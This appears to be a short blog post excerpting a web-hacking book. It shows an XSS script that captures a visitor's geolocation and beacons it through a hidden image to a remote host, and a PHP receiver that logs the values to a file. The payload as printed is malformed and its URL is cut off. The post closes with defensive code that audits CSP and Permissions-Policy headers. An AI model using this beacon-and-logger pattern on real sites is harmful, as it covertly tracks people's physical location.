Stealing geolocation via XSS

 

Injected XSS code:

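<script>
    // Timestamp plus the Chinese weekday name ('星期' + one of 日一二三四五六, Sunday through Saturday)
    var today =  new Date().toLocaleString() + '星期' + '日一二三四五六'.charAt(new Date().getDay());
    // Sets the hidden image's src so the browser sends the timestamp and coordinates in a GET request;
    // `position` is a Geolocation API position object, and the destination URL is cut off on the page
    document.getElementById('remote').src = "htttp:// + today + "----" + encodeURIComponent(position.coords.latitude) + "," + encodeURIComponent(position.coords.longitude);
</script>
<img id="remote" src="" width=0 height=0>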

test.php code:

<?php
    // Append the value of the "txt" query parameter to file.txt, one entry per line
    $fh = fopen("file.txt",'a+');
    fwrite($fh,$_GET["txt"]);
    fwrite($fh,"\r\n");
    fclose($fh);
?>

Excerpted from the book 《Web前端黑客技术揭秘》 (Web Front-End Hacking Techniques Revealed)
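
From the defender's side, the payload above depends on three things: an inline script being allowed to run, the page being allowed to call the Geolocation API, and an image request being allowed to leave for an arbitrary host. The JavaScript (Node.js) below is an added example, not code from the original post or the book; it audits a response's Content-Security-Policy and Permissions-Policy headers for those three conditions, and its function names and sample header values are constructed for illustration.

```javascript
// Added example: checks response headers for the three controls that break
// the payload above. Header values below are constructed samples.
function parseCsp(value) {
  const out = {};
  for (const part of (value || '').split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) out[name.toLowerCase()] = sources;
  }
  return out;
}

// Returns the raw allowlist for "geolocation", or null when the feature is not
// listed (the browser default is then "self", so the page itself may use it).
// Simplified parse: assumes no commas inside quoted origins.
function geolocationAllowlist(value) {
  for (const item of (value || '').split(',')) {
    const m = item.trim().match(/^geolocation\s*=\s*(.*)$/i);
    if (m) return m[1].trim();
  }
  return null;
}

function auditHeaders(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const csp = parseCsp(h['content-security-policy']);
  const effective = (d) => csp[d] || csp['default-src'] || null;

  // Inline <script> runs unless script-src (or default-src) forbids it.
  const script = effective('script-src');
  const pinned = !!script && script.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  const inlineScriptAllowed = !script || (script.includes("'unsafe-inline'") && !pinned);

  // The <img> beacon can reach any host unless img-src narrows it.
  const img = effective('img-src');
  const imgBeaconOpen = !img || img.some((s) => ['*', 'http:', 'https:'].includes(s));

  // geolocation=() disables navigator.geolocation for every origin.
  const geolocationAllowed = geolocationAllowlist(h['permissions-policy']) !== '()';
  return { inlineScriptAllowed, geolocationAllowed, imgBeaconOpen };
}

const weak = { 'Content-Security-Policy': "script-src 'self' 'unsafe-inline'; img-src *" };
const hardened = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self' 'nonce-r4nd0m'",
  'Permissions-Policy': 'camera=(), geolocation=()',
};
console.log('weak    ', auditHeaders(weak));
console.log('hardened', auditHeaders(hardened));
```

Any field that comes back true marks a condition the payload still has available; a site that never needs location can send geolocation=() on every response.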

posted on 2016-04-21 09:39  1tachi